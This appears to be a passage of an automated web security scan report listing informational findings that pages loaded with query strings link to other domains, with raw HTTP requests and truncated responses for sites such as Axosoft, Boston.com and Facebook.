<br /><a href='http://www.milanogranite.net' title='Visit this dealer online'>http://www.milanogranite.net</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=3521+Victory+Blvd+Staten+Island+NY%2C+10314'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.kabinetking.com/' title='Visit this dealer online'>http://www.kabinetking.com/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=1747+Hempstead+Turnpike+Elmont+NY%2C+11003'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.dentonstoneworks.com/' title='Visit this dealer online'>http://www.dentonstoneworks.com/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=94+Denton+Ave+Garden+City+Park+NY%2C+11040'>Get directions</a>
...[SNIP]...
<br /><a href='http://maps.google.com/maps?saddr=&daddr=1900+Central+Park+Ave+Yonkers+NY%2C+10710'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.centrecabinet.net/' title='Visit this dealer online'>http://www.centrecabinet.net/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=3950+Long+Beach+Rd+Island+Park+NY%2C+11558'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.plumberry.net/' title='Visit this dealer online'>http://www.plumberry.net/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=137+Columbia+Turnpike+Florham+Park+NJ%2C+07932'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.beckerlelumber.com/' title='Visit this dealer online'>http://www.beckerlelumber.com/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=3+Chestnut+Street+Spring+Valley+NY%2C+10977'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.wolfsingerdesign.com/' title='Visit this dealer online'>http://www.wolfsingerdesign.com/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=1745+Route+10+East+Morris+Plains+NJ%2C+07950'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.nyckd.com' title='Visit this dealer online'>http://www.nyckd.com</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=30+Broad+Way+Massapequa+NY%2C+11758'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.kpsearch.com/df/customconcepts/all.asp' title='Visit this dealer online'>http://www.kpsearch.com/df/customconcepts/all.asp</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=741B+West+Jericho+Turnpike+Huntington+NY%2C+11743'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.islandwidekitchens.com/' title='Visit this dealer online'>http://www.islandwidekitchens.com/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=250+E+Jericho+Tpke+Huntington+Station+NY%2C+11746'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.aaronco.com' title='Visit this dealer online'>http://www.aaronco.com</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=10+Industrial+Drive+New+Brunswick+NJ%2C+08901'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.completekitchenandbathdesign.com/' title='Visit this dealer online'>http://www.completekitchenandbathdesign.com/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=53+Commack+Rd+Commack+NY%2C+11725'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.cottonekitchens.com' title='Visit this dealer online'>http://www.cottonekitchens.com</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=249+W+Main+St+Bay+Shore+NY%2C+11706'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.cranburydesigncenter.com/' title='Visit this dealer online'>http://www.cranburydesigncenter.com/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=145+W.+Ward+Street+Hightstown+NJ%2C+08520'>Get directions</a>
...[SNIP]...
<br /><a href='http://maps.google.com/maps?saddr=&daddr=1621+Lakeland+Ave+Bohemia+NY%2C+11716'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.theresemarcels.com/' title='Visit this dealer online'>http://www.theresemarcels.com/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=1456+Middle+Country+Rd+Centereach+NY%2C+11720'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.aaronco.com' title='Visit this dealer online'>http://www.aaronco.com</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=311+South+Main+Street+Flemington+NJ%2C+08822'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.ironwoodcd.com' title='Visit this dealer online'>http://www.ironwoodcd.com</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=2230+Clements+Ave+Pennington+NJ%2C+08534'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.ironwoodcd.com' title='Visit this dealer online'>http://www.ironwoodcd.com</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=1+Tree+Farm+Road+Pennington+NJ%2C+08534'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.mjsdesignsunlimited.net/' title='Visit this dealer online'>http://www.mjsdesignsunlimited.net/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=725+Route+25A+STE+12+Miller+Place+NY%2C+11764'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.sskdinc.com/' title='Visit this dealer online'>http://www.sskdinc.com/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=108+Montauk+Hwy+Moriches+NY%2C+11955'>Get directions</a>
...[SNIP]...
<br /><a href='http://maps.google.com/maps?saddr=&daddr=216+Ryers+Ave+Cheltenham+PA%2C+19012'>Get directions</a>
...[SNIP]...
<noscript><iframe src="http://view.atdmt.com/iaction/pvmway_1456" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

20.55. http://www.adminitrack.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adminitrack.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?gclid=COjL1IrNjaoCFQ495QodxUaNzg HTTP/1.1
Host: www.adminitrack.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 19 Jul 2011 14:20:31 GMT
Content-Length: 28976
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: AT=VISITOR=Y; expires=Wed, 18-Jul-2012 14:20:31 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta h
...[SNIP]...
<div id="verisign">
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.adminitrack.com&size=S&use_flash=NO&use_transparent=YES&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="//VERIFY.AUTHORIZE.NET/anetseal/seal.js"></script><br />
<a href="http://www.authorize.net/" id="AuthorizeNetText" target="_blank">Credit Card Processing</a>
...[SNIP]...
<hr /> -->
<a href="https://www.export.gov/safehrbr/list.aspx" target="_blank">We self-certify compliance with</a><br />

<a href="http://export.gov/safeharbor" id="safeharbor" target="_blank"><img src="images/safe_harbor_logo.gif" id="ctl00_ContentPlaceHolder1_RightBar1_safeharborlogo" align="middle" width="145" height="70" border="0" alt="Safe Harbor" />
...[SNIP]...

20.56. http://www.axosoft.com/lp/ga/bug-tracking-software/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.axosoft.com
Path:   /lp/ga/bug-tracking-software/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /lp/ga/bug-tracking-software/?gclid=CNO474vNjaoCFYeD5QodMEA10A HTTP/1.1
Host: www.axosoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gd4ro2453nos1b55a10z0q3f; _jsuid=2794942522048503467; is_returning=1; __utma=37276784.862101086.1311078323.1311078323.1311085183.2; __utmb=37276784.2.10.1311085183; __utmc=37276784; __utmz=37276784.1311078323.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=y78z346lekhphix3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11040


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><script type="text/
...[SNIP]...
</form>
       <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
<div style="float:right; margin-top: 15px">
       <a href="http://www.twitter.com/axosoft" target="_blank"><img src="/images/General/icon_twitter_30x30.png" alt="Follow Axosoft on Twitter" width="30" height="30" style="vertical-align:bottom; padding:5px;" /></a>
           <a href="http://www.youtube.com/user/axosoft" target="_blank"><img src="/images/General/icon_youtube_30x30.png" alt="YouTube Axosoft" style="vertical-align: bottom; padding:5px;" /></a>
           <a href="http://www.facebook.com/AxosoftOnTime" target="_blank"><img src="/images/General/icon_facebook_30x30.png" alt="Become a Fan on Facebook!" style="vertical-align: bottom; padding:5px;" />
...[SNIP]...
<center> .. Copyright 2002 - 2011 Axosoft LLC | All Rights Reserved | <a href="http://privacy-policy.truste.com/verified-policy/www.axosoft.com" target="_blank" style="color:#000000">Privacy Policy&nbsp;</a><a href="//privacy-policy.truste.com/click-to-verify/www.axosoft.com" target="_blank"><img src="http://privacy-policy.truste.com/verified-seal/www.axosoft.com/green/v.png" alt="Privacy-Policy-By-TRUSTe" width="65" height="78" style="border: none; vertical-align: middle; margin-left: 10px; margin-top: 0px; margin-bottom: 0px"/></a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1072425968/?label=SBEcCIrZgQIQ8Nev_wM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

20.57. http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boston.com
Path:   /Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links HTTP/1.1
Host: www.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7; __qca=P0-192291824-1311108181675; s_cc=true; s_pv=Boston.com%20home%20page; s_sq=nytbglobe%3D%2526pid%253DBoston.com%252520home%252520page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7%2526ot%253DA; s_ppv=16

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Etag: 71649c45-ebf6-409f-85b6-7e83c3d59026
Content-Type: text/html;charset=UTF-8
Date: Tue, 19 Jul 2011 20:43:47 GMT
Set-Cookie: bcpage=9;expires=Wed, 22-Jun-2016 20:43:47 GMT;path=/;domain=boston.com;
Content-Length: 42969
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="eng">
<!-- Methode uuid: "b12c8144-b20e-11e0-aa83-a59fd6e1b552" -->
<head>
<title
...[SNIP]...
<span id="gLogoSub"><a href="https://bostonglobe.com/subscriber/offer/go/zip.asp?cd=WW015697&od=28">Home Delivery</a>
...[SNIP]...
<li><a href="http://www.legacy.com/BostonGlobe/DeathNotices.asp" id="secnav_obituaries">Obituaries</a>
...[SNIP]...
</div>
                       <iframe id="fbLike" src="http://www.facebook.com/plugins/like.php?href=http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html&amp;layout=standard&amp;show_faces=false&amp;width=425&amp;font=arial&amp;colorscheme=light&amp;ref=blogindex" scrolling="no" frameborder="0" allowTransparency="true" ></iframe>
...[SNIP]...
<li><iframe id="fbLike" src="http://www.facebook.com/plugins/like.php?href=http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html&amp;layout=standard&amp;show_faces=false&amp;width=190&amp;font=arial&amp;colorscheme=light&amp;ref=blogent" scrolling="no" frameborder="0" allowTransparency="true" ></iframe>
...[SNIP]...
</ul>
           <script src="http://w.sharethis.com/button/sharethis.js#publisher=e1e0ea5a-a326-4731-b1d1-f21623043511&amp;type=website&amp;button=false" type="text/javascript"></script>
...[SNIP]...
<div align="center">
<a href="http://www.truste.org/ivalidate.php?url=www.boston.com&sealid=101"><img height="47" width="171" src="http://graphics.boston.com/images/registration/truste2007/TRUSTe_Certified_Privacy.gif" alt="TRUSTe Certified Privacy" />
...[SNIP]...
<div class="updateLink2">
       <a href="http://add.my.yahoo.com/rss?url=http://syndication.boston.com/business/ticker/index.xml">My Yahoo</a>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://nytbglobe.112.2O7.net/b/ss/nytbglobe/1/H.19.3--NS/0" height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
<li><a href="http://www.uclick.com/client/bos/el/?p1=Bottom_Plus_Horoscopes"
class="bold">
Horoscopes</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.bostonglobe.com/advertiser/online/online.aspx?id=13052">Advertise</a>
...[SNIP]...
<li><a href="http://jobsearch.boston.monster.com/jobs/boston-globe-media+boston-globe+boston__2ecom_666?where=Boston__2C-MA&rad=10&sort=rv.dt&cy=us">Work here</a>
...[SNIP]...
<li class="first"><a rel="nofollow" href="http://bostonglobe.com/aboutus/contact_us/default.aspx">Contact The Boston Globe</a>
...[SNIP]...
<li><a href="http://bostonglobe.com/subscribers/homedelivery.aspx?id=5278">Subscribe</a>
...[SNIP]...
<li><a rel="nofollow" href="http://bostonglobe.com/subscribers/custserv.aspx?id=5274">Manage your subscription</a>
...[SNIP]...
<li><a href="http://bostonglobe.com/advertiser/default.aspx">Advertise</a>
...[SNIP]...
<li><a rel="nofollow" href="http://bostonglobe.com/subscribers/extras/index.aspx">The Boston Globe Extras</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.doriancolor.com/page3.html">The Boston Globe Gallery</a>
...[SNIP]...
<div>
   <img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-604060h&amp;cg=0&amp;cc=1&amp;ts=noscript" width="1" height="1" alt="" />
   </div>
...[SNIP]...

20.58. http://www.clickmanage.com/events/clickevent.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clickmanage.com
Path:   /events/clickevent.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /events/clickevent.aspx?ca=10332&e=4&l=1044996461&u=http%25253A%25252F%25252Fwww.numarasoftware.com%25252Fwelcome%25252Fservice_desk.aspx%25253Fsrc%25253Dgoogle%252526trm%25253Dissue_tracking_software&gclid=CIGmsIfNjaoCFct95QodzRHo0Q HTTP/1.1
Host: www.clickmanage.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 19 Jul 2011 14:20:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
P3P: policyref="http://www.clickmanage.com/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://www.numarasoftware.com/welcome/service_desk.aspx?src=google&trm=issue_tracking_software
Set-Cookie: uid=21367747-2c53-4cc6-a391-4d75cc92d57b; expires=Wed, 18-Jul-2012 14:20:23 GMT; path=/
Set-Cookie: cp=10332,634466676237062500,4,1044996461,599266080000000000,0*|; expires=Wed, 18-Jul-2012 14:20:23 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 215

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='http://www.numarasoftware.com/welcome/service_desk.aspx?src=google&amp;trm=issue_tracking_software'>here</a>.</h2>
<
...[SNIP]...

20.59. http://www.discoverbing.com/dbing/community.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.discoverbing.com
Path:   /dbing/community.axd

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dbing/community.axd?itemPath=/sitecore/content/Home/Community HTTP/1.1
Host: www.discoverbing.com
Proxy-Connection: keep-alive
Referer: http://www.discoverbing.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1307200261952; bingresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22DDINPROGRESS%22%2C%22url%22%3A%22http%253A//social.discoverbing.com/%22%2C%22timestamp%22%3A1307372850950%7D%2C%22lastinvited%22%3A1307372850950%2C%22userid%22%3A%221307361123212927392730955034%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5B%22p102855664%22%5D%7D; ASP.NET_SessionId=yln2iy45tia1yyebr32a2n55; dbingvisitnew=TRUE; 081c924b-ddfd-447a-8c7a-2db01211cae7=%7B%22parent_id%22%3A%22%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%22nSlUkQ8r7Lb%22%2C%22wom%22%3Afalse%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.discoverbing.com%2F%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; s_cc=true; s_vnum=1313680622771%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:16:56 GMT
Content-Length: 5941

<div class="item twitter"><h4></h4><p><a href="http://twitter.com/cabeautravel">@cabeautravel</a>..Awesome! So glad you love!</p><p class='meta'>Posted by <a target='_blank' href='http://twitter.com/fareologist/statuses/93130335704973312'>@fareologist (Bing Travel)</a>
...[SNIP]...
<p><a href="http://twitter.com/parinda">@parinda</a>
...[SNIP]...
<p class='meta'>Posted by <a target='_blank' href='http://twitter.com/fareologist/statuses/93130006217232384'>@fareologist (Bing Travel)</a>
...[SNIP]...
<p>Ever wondered how we choose our daily homepage images? <a href="http://twitter.com/fastcompany">@fastcompany</a> gives the lowdown: <a href="http://binged.it/nippna">http://binged.it/nippna</a>
...[SNIP]...
<p class='meta'>Posted by <a target='_blank' href='http://twitter.com/bing/statuses/93127195932897280'>@bing (Bing)</a>
...[SNIP]...
<p><a href="http://twitter.com/jlampert736">@jlampert736</a>
...[SNIP]...
<p class='meta'>Posted by <a target='_blank' href='http://twitter.com/bing/statuses/93122812495138816'>@bing (Bing)</a>
...[SNIP]...
<p><a href="http://twitter.com/driftingcowgirl">@driftingcowgirl</a>
...[SNIP]...
<p class='meta'>Posted by <a target='_blank' href='http://twitter.com/bing/statuses/93122292908961792'>@bing (Bing)</a>
...[SNIP]...
<p>Tacky souvenirs? No way! Get cool stuff on every trip w/ this guide: <a href="http://binged.it/oLb8PP">http://binged.it/oLb8PP</a>
...[SNIP]...
<p class='meta'>Posted by <a target='_blank' href='http://twitter.com/fareologist/statuses/93099710876893184'>@fareologist (Bing Travel)</a>
...[SNIP]...
<p><a href="http://search.twitter.com/search?q=%23HarryPotter" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/intra/hashtag/#HarryPotter');">#HarryPotter</a> has best opening weekend ever. Surprised?<a href="http://binged.it/o8l1rd">http://binged.it/o8l1rd</a>
...[SNIP]...
<p class='meta'>Posted by <a target='_blank' href='http://twitter.com/bing/statuses/93089279852552194'>@bing (Bing)</a>
...[SNIP]...
<p>Like creepy tours? Us too. 12 Creepiest Abandoned Prisons on Earth to visit: <a href="http://binged.it/mTtfAy">http://binged.it/mTtfAy</a>
...[SNIP]...
<p class='meta'>Posted by <a target='_blank' href='http://twitter.com/fareologist/statuses/93083728095621120'>@fareologist (Bing Travel)</a>
...[SNIP]...
<p>Procrastinators ... don...t worry, we can help. Last minute flights (&amp; cheap) are here: <a href="http://binged.it/qkLfBH">http://binged.it/qkLfBH</a>
...[SNIP]...
<p class='meta'>Posted by <a target='_blank' href='http://twitter.com/fareologist/statuses/93071318525812736'>@fareologist (Bing Travel)</a>
...[SNIP]...
<p><a href="http://search.twitter.com/search?q=%23Carmageddon" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/intra/hashtag/#Carmageddon');">#Carmageddon</a> is officially over. Order is restored in LA. Phew! <a href="http://binged.it/os8aLq">http://binged.it/os8aLq</a>
...[SNIP]...
<p class='meta'>Posted by <a target='_blank' href='http://twitter.com/bing/statuses/93066979623178240'>@bing (Bing)</a>
...[SNIP]...
<p><a href='http://www.bing.com/community/Site_Blogs/b/search/archive/2011/07/18/it-s-not-too-late-to-book-great-summer-travel-deals-summer-fareology-update-from-bing.aspx' target='_blank'>It...s Not Too Late to Book Great Summer Travel Deals: Summer Fareology Update from Bing</a>
...[SNIP]...
<p class='meta'>Posted by <a href='http://www.bing.com/community/Site_Blogs/b/search/archive/2011/07/18/it-s-not-too-late-to-book-great-summer-travel-deals-summer-fareology-update-from-bing.aspx' target='_blank'>The Bing Team</a>
...[SNIP]...
<p><a href='http://www.bing.com/community/Site_Blogs/b/search/archive/2011/07/05/bing-for-ipad-update-searching-without-a-search-box.aspx' target='_blank'>Bing for iPad Update: Searching Without a Search Box</a>
...[SNIP]...
<p class='meta'>Posted by <a href='http://www.bing.com/community/Site_Blogs/b/search/archive/2011/07/05/bing-for-ipad-update-searching-without-a-search-box.aspx' target='_blank'>The Bing Team</a>
...[SNIP]...
<p><a href='http://www.bing.com/community/Site_Blogs/b/search/archive/2011/06/29/photosynth-app-update-and-best-of-bing-maps-summer-xbox-amp-kinect-contest.aspx' target='_blank'>Photosynth App Update and Best of Bing Maps Summer Xbox & Kinect Contest</a>
...[SNIP]...
<p class='meta'>Posted by <a href='http://www.bing.com/community/Site_Blogs/b/search/archive/2011/06/29/photosynth-app-update-and-best-of-bing-maps-summer-xbox-amp-kinect-contest.aspx' target='_blank'>The Bing Team</a>
...[SNIP]...
<p><a href='http://www.bing.com/community/Site_Blogs/b/search/archive/2011/06/08/bing-for-mobile-browse-gets-more-social.aspx' target='_blank'>Bing for Mobile Browse Gets More Social</a>
...[SNIP]...
<p class='meta'>Posted by <a href='http://www.bing.com/community/Site_Blogs/b/search/archive/2011/06/08/bing-for-mobile-browse-gets-more-social.aspx' target='_blank'>The Bing Team</a>
...[SNIP]...
<p><a href='http://www.bing.com/community/Site_Blogs/b/webmaster/archive/2011/06/08/updates-to-bing-webmaster-tools-data-and-content.aspx' target='_blank'>Updates to Bing Webmaster Tools, data and content.</a>
...[SNIP]...
<p class='meta'>Posted by <a href='http://www.bing.com/community/Site_Blogs/b/webmaster/archive/2011/06/08/updates-to-bing-webmaster-tools-data-and-content.aspx' target='_blank'>Duane Forrester</a>
...[SNIP]...

20.60. http://www.facebook.com/advertising/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /advertising/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /advertising/?campaign_id=402047449186&placement=pflo&extra_1=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffacebook; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fadvertising%2F%3Fcampaign_id%3D402047449186%26placement%3Dpflo%26extra_1%3D0; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.88.37
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:45 GMT
Content-Length: 22238

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/advertising\/index.php";window._EagleEyeSeed="42vQ";</scr
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/2zvsC0zVzMB.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/PCqjbIZdno-.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/lwKG0ViYlaK.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/Q3Oe8zcURw5.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/AKFdbdR6W5B.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/H9wnMF3Lri6.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
